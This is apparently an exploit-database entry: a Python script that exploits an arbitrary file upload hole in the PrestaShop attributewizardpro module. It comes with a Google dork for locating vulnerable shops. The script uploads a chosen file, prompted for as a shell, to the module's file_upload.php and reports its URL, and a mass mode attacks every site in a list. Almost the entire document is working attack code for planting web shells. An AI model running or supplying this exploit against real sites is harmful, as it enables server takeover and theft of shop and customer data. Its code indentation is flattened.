# Exploit Title: [Prestashop attributewizardpro module Arbitrary File Upload exploit]
# Google Dork: [inurl:/modules/attributewizardpro/]
# Date: [29-july-2016]
# Exploit Author: [PentesterDesk]
# Vendor Homepage: [https://www.prestashop.com/en/download]
# Tested on: [debain os]
#Greets to : TO all indian hackers & special thanks to Muhammad Faisal Gunanda
=====================================================================
#!/usr/bin/python
####################################################################################
#Author : PentesterDesk
#Date : 29-June-2016
#Software: Prestashop CMS
#vuln Mod: attributewizardpro
####################################################################################
import sys, os
import requests
def main():
os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
banner = '''
+======================================================+
| Prestashop | FileUpload Exp | PentesterDesk |
| Coded by : PentesterDesk Team |
| Contact : pentesterdesk@gmail.com |
+======================================================+
'''
print banner
#/modules/attributewizardpro/
os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
print banner
print "\n <============[[Attributewizardpro Exploit]]============>\n"
print "[1] Single Site "
print "[2] Mass Upload"
ch=raw_input("\n[>] ")
if ch == '1':
os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
print banner
print "\n <============[[Attributewizardpro Exploit]]============>\n"
url = raw_input("[+] Enter Url : ")
filname= raw_input("[+] Enter File : ")
if filname == '' or url == '':
print "\n[!] Url or File is not entered\n"
raw_input("[+] Press Enter [>] ")
main()
url = url + "/modules/attributewizardpro/file_upload.php"
#main
files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
req=requests.post(url,files=files)
final =[]
final = (req.text).split("||||")
if req.status_code == 200 and filname in req.text:
url=url.replace('/file_upload.php','/file_uploads/'+final[0])
print ("[+] %s [ok]" % (url))
else:
print "\n[+] %s [no]\n" %url
raw_input("\n[+] Press Enter [>] ")
#mass
if ch == '2':
os.system('cls' and 'color -a' if os.name == "nt" else 'clear')
print banner
print "\n <============[[Attributewizardpro Exploit]]============>\n"
filee = raw_input("[+] Enter List Name : ")
filname= raw_input("[+] Enter Shell Name : ")
if filname == '' or filee == '':
print "\n[!] Url or File is not entered\n"
raw_input("[+] Press Enter [>] ")
main()
ob = open(filee,'r')
lists = ob.readlines()
list1 = []
i = 0
for i in range(len(lists)):
list1.append(lists[i].strip('\n'))
count = 0
for site in (list1):
count = count + 1
url = site + "/modules/attributewizardpro/file_upload.php"
files={'userfile':(filname, open(filname,'rb'),'multipart/form-data')}
req=requests.post(url,files=files)
final =[]
final = (req.text).split("||||")
if req.status_code == 200 and filname in req.text:
url=url.replace('/file_upload.php','/file_uploads/'+final[0])
print ("[%d] %s [ ok ]" % (count,url))
else:
print ("[%d] %s [ No ]" % (count,url))
if __name__ == "__main__":
main()
